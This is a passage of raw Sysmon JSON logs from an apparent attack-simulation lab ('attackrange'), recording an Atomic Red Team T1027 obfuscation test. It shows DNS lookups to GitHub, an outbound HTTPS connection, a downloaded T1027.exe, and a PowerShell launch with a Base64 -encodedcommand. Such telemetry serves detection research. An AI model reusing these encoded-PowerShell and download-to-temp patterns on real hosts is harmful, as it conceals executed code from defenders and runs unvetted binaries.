05:52:38.499","ProcessGuid":"{A837DB8D-0326-5F25-0000-0010E3F20700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-881393.attackrange.local","SourcePort":"54957","DestinationIsIpv6":"false","DestinationIp":"199.232.64.133","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 05:52:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":5004,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:38.318\r\nProcessGuid: {A837DB8D-0326-5F25-0000-0010E3F20700}\r\nProcessId: 4944\r\nQueryName: github.com\r\nQueryStatus: 0\r\nQueryResults: ::ffff:140.82.113.4;\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:52:38.318","ProcessGuid":"{A837DB8D-0326-5F25-0000-0010E3F20700}","QueryName":"github.com","QueryStatus":"0","QueryResults":"::ffff:140.82.113.4;","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventReceivedTime":"2020-08-01 05:52:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":5005,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:38.487\r\nProcessGuid: {A837DB8D-0326-5F25-0000-0010E3F20700}\r\nProcessId: 4944\r\nQueryName: raw.githubusercontent.com\r\nQueryStatus: 0\r\nQueryResults: type:  5 github.map.fastly.net;::ffff:199.232.64.133;\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:52:38.487","ProcessGuid":"{A837DB8D-0326-5F25-0000-0010E3F20700}","QueryName":"raw.githubusercontent.com","QueryStatus":"0","QueryResults":"type:  5 github.map.fastly.net;::ffff:199.232.64.133;","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventReceivedTime":"2020-08-01 05:52:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5006,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 05:52:41.703\r\nProcessGuid: {A837DB8D-0326-5F25-0000-0010E3F20700}\r\nProcessId: 4944\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe\r\nCreationUtcTime: 2020-08-01 05:52:41.703","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 05:52:41.703","ProcessGuid":"{A837DB8D-0326-5F25-0000-0010E3F20700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe","CreationUtcTime":"2020-08-01 05:52:41.703","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5007,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:41.777\r\nProcessGuid: {A837DB8D-0329-5F25-0000-00109AAF0900}\r\nProcessId: 3488\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" & {if (Test-Path %%temp%%\\temp_T1027.zip\\T1027.exe) {exit 0} else {exit 1}} \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-0323-5F25-0000-0020A2950700}\r\nLogonId: 0x795A2\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {A837DB8D-0324-5F25-0000-00100DC10700}\r\nParentProcessId: 4984\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBHAGUAdABQAHIAZQByAGUAcQBzAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:41.777","ProcessGuid":"{A837DB8D-0329-5F25-0000-00109AAF0900}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" &amp; {if (Test-Path %%temp%%\\temp_T1027.zip\\T1027.exe) {exit 0} else {exit 1}} ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-0323-5F25-0000-0020A2950700}","LogonId":"0x795a2","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{A837DB8D-0324-5F25-0000-00100DC10700}","ParentProcessId":"4984","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBHAGUAdABQAHIAZQByAGUAcQBzAA==","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5008,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:41.765\r\nSourceProcessGUID: {A837DB8D-0324-5F25-0000-00100DC10700}\r\nSourceProcessId: 4984\r\nSourceThreadId: 4316\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-0329-5F25-0000-00109AAF0900}\r\nTargetProcessId: 3488\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977435cf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97743443(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977c5c6f(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9773c02b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f4fce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97704823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97762cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977461e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9773816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977712fd(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:41.765","SourceProcessGUID":"{A837DB8D-0324-5F25-0000-00100DC10700}","SourceProcessId":"4984","SourceThreadId":"4316","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-0329-5F25-0000-00109AAF0900}","TargetProcessId":"3488","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977435cf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97743443(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977c5c6f(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9773c02b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f4fce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97704823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97762cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977461e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9773816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977712fd(wow64)","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5009,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:41.765\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0329-5F25-0000-00109AAF0900}\r\nTargetProcessId: 3488\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:41.765","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0329-5F25-0000-00109AAF0900}","TargetProcessId":"3488","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5010,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:41.765\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:41.765","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5011,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:41.765\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:41.765","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
